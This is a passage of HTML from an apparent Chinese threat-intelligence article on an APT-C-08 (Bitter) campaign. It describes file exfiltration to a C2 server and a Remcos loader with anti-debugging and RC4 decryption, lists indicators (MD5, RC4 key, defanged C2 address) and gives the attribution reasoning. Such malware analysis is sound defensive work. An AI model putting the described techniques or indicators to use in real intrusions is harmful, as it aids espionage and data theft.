data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1v16">读取目标文件的内容</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3567708333333333" data-w="768" style="width: 553.74px;height: 197.54px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c9359c9e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIiapzicSn7bJoRrGPHbdzZsbADWLVWlGhpCkncOlI1lBq2JdpMU6KPdBPgLthQGLOTiaNrbnzwNu2RyNMhiaD88faicLJicOzfww4hs%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1nw8">将文件内容post到C2服务器中。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1935933147632312" data-w="718" style="width: 553.74px;height: 107.2px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2bfb61c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJrwx3geUQrreTS6NmIzWRnNqysQ7fCVclrJeX9BOYy5wCW9BhsGPOhY9kc1KcvDDj5lJwAMVoNiaWW9ZyxSkpPDtaCqJrIKonY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span><o:page></o:page></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou19cf"><span textstyle="" style="font-weight: bold;">Remcos后门</span></span></p></li></ul><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="mo19dgou1g7a" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该组件是一个加载器，用于释放加载Remcos后门。</span></span></p><div style="margin-left: 0;margin-right: 0;"><div><div><div><div><p><table style="width:481px;"><tbody><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">017eb0e90e70a48e3b57f9c315e280f5</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件名称</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">imagingdevices.exe</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;" data-mpa-action-id="mo19y1vp1jk3"><span leaf="">9.33 MB (9783680 bytes)</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件类型</span></span></p></td><td data-colwidth="354"><p data-mpa-action-id="mo2jaw3a1ml6"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">exe</span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;"><span leaf="">1）样本检测是否被调试，检测互斥体。</span></p></div></div></div><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.34532374100719426" data-w="695" style="width: 553.74px;height: 191.2px;" src="https://wechat2rss.xlab.app/img-proxy/?k=8b2be761&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJmg92pmpPGBDlnIUsO9FL8rVopia72AicXkht4USJrkSK3s97LZDHYfaDzBOclw4K7wVE5qrU2iaf3xS7z39SNZaTXxgVC4tRq3w%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou6a4" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本使用rc4进行解密，密钥：</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgoun7j">wJhZdeKG30FY70E315U2qMf0h3CvBD7N</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3054989816700611" data-w="491" style="width: 490.95px;height: 149.98px;" src="https://wechat2rss.xlab.app/img-proxy/?k=0155531f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXI9HeWf4DHENZLT3Qtrjux9eiboibhSBuvJnOGxrDsRXjr0icWg2jctdc5u5531edickJFvmyL9PArFSl3cjeWfJFCB1JTbr8LwWpk%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou701" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">解密后数据为PE文件，其中有Remcos经典字符串。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25263157894736843" data-w="475" style="width: 474.95px;height: 119.99px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7ffe5087&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKJ9dicsFEicFfhiaIEN0Ab3HrSNostwXicEvhVbOvYx6czxMBcMH4ZMoRqLdUd3A9rBx2GJBBTeggElvVtBSF45OZ3aEB4iaZctWVA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou17p3" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-remoteid="" data-asynid="" src="http://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXJclyK2qY5iajZL69cq5oiaI1T9G7BBfiaXZSdzpT2Suyvzdmzn7yOyYqO0udL5QodpFEmtibtezAiaFJavAODgrjYRBAOlloR2QfpI/0?wx_fmt=png" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="0.13978494623655913" data-s="" data-type="" data-w="465" aria-label="" aria-braillelabel="" aria-description="" height="" hspace="" ismap="" opacity="" sizes="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;" title="" type="" usemap="" vspace="" width="" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="" data-retry="">4）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Remcos的C2配置信息89.31.121[.]220:443</span></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.13978494623655913" data-w="465" style="width: 464.95px;height: 64.99px;" src="https://wechat2rss.xlab.app/img-proxy/?k=328c4a04&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJclyK2qY5iajZL69cq5oiaI1T9G7BBfiaXZSdzpT2Suyvzdmzn7yOyYqO0udL5QodpFEmtibtezAiaFJavAODgrjYRBAOlloR2QfpI%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><h1 style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span mpa-font-style="mo19dgou13kl"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;background-color: rgb(190, 25, 31);color: rgb(255, 255, 255);font-weight: bold;font-size: 18px;"> 二、</span><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;background-color: rgb(190, 25, 31);color: rgb(255, 255, 255);font-weight: bold;font-size: 18px;">归属研判 </span></span></h1><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou7zl">蔓灵花使用NUITKA打包的python样本攻击，最早出现在25年年底，主要针对于巴基斯坦、孟加拉等周边国家。近期监测发现，该类样本的攻击目标范围出现新的变化。</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou176x">1.对本次攻击的relish_for_ketty.dll，与巴基斯坦的历史样本进行对比，二者代码执行流程非常一致，均使用了python312版本，且加载使用的python模块也完全相同。</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1v8o">2.本次攻击使用的Remcos远控组件，也曾出现在过往针对巴基斯坦地区的攻击活动中。</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1v8o">综合上述线索可判断，本次攻击归属于APT-C-08（蔓灵花）组织。</span></p><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="Powered by 135editor.com" mpa-from-tpl="t"><div data-role="outer" mpa-from-tpl="t"><div data-tools="135编辑器" data-id="101849" mpa-from-tpl="t"><div style="margin-top: 10px;margin-bottom: 10px;" mpa-from-tpl="t"><div style="margin-bottom: -15px;display: flex;transform: rotate(0deg);" mpa-from-tpl="t"><p data-brushtype="text" style="padding-right: 1em;padding-left: 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="font-size: 17px;"><span leaf="" mpa-font-style="mojg56101t2v" style="font-size: 18px;" data-mpa-action-id="mojg561q1u8m" data-pm-slice="0 0 []">总结</span></span></strong></p></div><div style="margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;" mpa-from-tpl="t"><div data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;" mpa-from-tpl="t"><div style="text-indent: 2em;" mpa-from-tpl="t"><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;101849&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-autoskip&#34;:&#34;1&#34;,&#34;style&#34;:&#34;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 8px;margin-bottom: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">APT-C-08</span><span leaf="">（</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;101849&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-autoskip&#34;:&#34;1&#34;,&#34;style&#34;:&#34;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 8px;margin-bottom: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">蔓灵花）组织是一个拥有南亚地区国家民族背景的APT组织，近年来持续对南亚地区及周边国家实施网络攻击活动，攻击目标覆盖政府、军工、高校和驻外机构等企事业单位组织，是当前具有较高威胁度的境外APT组织之一。</span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="">在这里提醒用户加强安全意识，切勿执行未知样本或点击来历不明的链接等操作。这些行为可能导致系统在没有任何防范的情况下被攻陷，从而导致机密文件和重要情报的泄漏。</span></p></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mo19io1yi3x"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="edit by 135editor" mpa-from-tpl="t"><div data-role="title" data-tools="135编辑器" data-id="85638" mpa-from-tpl="t"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);" mpa-from-tpl="t"><p style="margin-top: -1.2em;text-align: center;border: none;line-height: 1.4;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;" mpa-is-content="t"><span leaf="">附录IOC</span></span></strong></p></div></div></div></div></div><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, 